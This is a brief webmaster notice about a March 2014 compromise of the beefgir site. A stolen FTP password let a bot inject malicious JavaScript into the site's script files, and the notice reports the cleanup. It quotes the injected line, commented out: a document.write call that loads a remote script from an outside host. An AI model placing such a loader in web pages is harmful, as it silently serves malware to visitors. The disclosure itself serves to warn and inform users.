ANY one who has Accessed beefgir after march first scan your system for viruses
here are some links to good free antivirus/malware
Don’t worry we still have control of the site but the java script files have been compromised up to 3 layers deep
I have fixed all the js files that the homepages uses to be sure that it is still safe to use
the forums do not use java script so they are safe
I have taken down the gallery do to its heavy usage of java script until I can clean that up as well
I have opened a ticket with the host so they can address the security hole
what has happened was a compromised ftp password march 1 2014 @9:33 AM EST an ftp bot ran through all the site (up to 3 levels deep and injected this:
(note i commented the section out in case a browser trys to read it)
/*
/*19f955*/
/*pcpc0978586pc09*/
document.write(“<script type=’text/javascript’ src=’http://kleraostrada.com.br/brpH7TXR.php?id=’></”+ “script>”);
/*/19f955*/
*/
the site is safe as of now